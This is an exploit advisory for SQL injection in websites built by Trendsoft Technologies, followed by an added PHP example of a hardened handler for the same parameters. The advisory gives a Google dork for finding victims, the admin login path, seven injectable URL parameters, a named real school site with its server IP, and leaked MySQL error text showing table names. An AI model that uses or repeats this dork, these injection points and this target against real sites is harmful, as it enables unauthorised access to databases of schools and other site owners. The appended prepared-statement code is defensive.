############################################################
# Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trendsoft.info
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
############################################################
# Admin Panel Login Path :
***********************
/admin/
# SQL Injection Exploit :
*********************
/page_detail.php?sid=Njk=&pid=NTA=[SQL Injection]
/contact_us.php?sid=NQ==[SQL Injection]
/principal_message.php?sid=Mg==[SQL Injection]
/alumni_gallery.php?pid=MQ==[SQL Injection]
/kg_gallery.php?pid=MQ==[SQL Injection]
/video_gallery.php?pid=Ng==[SQL Injection]
/onlineapp/AdmFormfatima.php?id=[SQL Injection]
############################################################
# Example Vulnerable Site =>
**************************
Note => (103.92.235.205) => There are 7 domains hosted on this server.
[+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27
[Proof of Concept ] => archive.fo/0S8I0
############################################################
# SQL Database Error :
*********************
cannot execute query select staticId,parentId,staticTitle,externalLink from
tbl_fatima_static_pages where enable='Activate' and parentId=505 order by
orderOfAppearance ascYou have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near order by orderOfAppearance asc' at line 1
select * from adminsetup where class=
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1
############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################
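
Added example, not part of the original advisory and not the vendor's code: a hardened PHP handler for the base64-wrapped id parameters listed above, using the table and column names that appear in the error output. The function names, the PDO connection, and the mapping of pid to the parentId filter are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: decode a base64-wrapped id and accept it only if the
// result is a short run of digits. Strict mode rejects any character outside
// the base64 alphabet, so a trailing quote or SQL fragment fails here.
function decode_id_param($raw): ?int
{
    if (!is_string($raw) || $raw === '' || strlen($raw) > 16) {
        return null;
    }
    $decoded = base64_decode($raw, true);
    if ($decoded === false || !ctype_digit($decoded) || strlen($decoded) > 9) {
        return null;
    }
    return (int) $decoded;
}

// Same table and columns as in the leaked error text, but the id is bound as
// a typed parameter instead of being concatenated into the statement.
function fetch_child_pages(PDO $db, int $parentId): array
{
    $stmt = $db->prepare(
        "SELECT staticId, parentId, staticTitle, externalLink
           FROM tbl_fatima_static_pages
          WHERE enable = 'Activate' AND parentId = :pid
          ORDER BY orderOfAppearance ASC"
    );
    $stmt->bindValue(':pid', $parentId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hypothetical request handler. Assumes $db was created with
// PDO::ATTR_ERRMODE = PDO::ERRMODE_EXCEPTION and emulated prepares disabled.
// Malformed ids get a 400; database failures are logged server-side and the
// client sees a generic 500, never the query text or the MySQL message.
function render_page_detail(PDO $db, array $query): array
{
    $pid = decode_id_param($query['pid'] ?? null);
    if ($pid === null) {
        http_response_code(400);
        return [];
    }
    try {
        return fetch_child_pages($db, $pid);
    } catch (PDOException $e) {
        error_log('page_detail query failed: ' . $e->getMessage());
        http_response_code(500);
        return [];
    }
}
```

The same decode-validate-bind pattern applies to the sid and id parameters on the other listed scripts; base64 encoding of a parameter is not input validation.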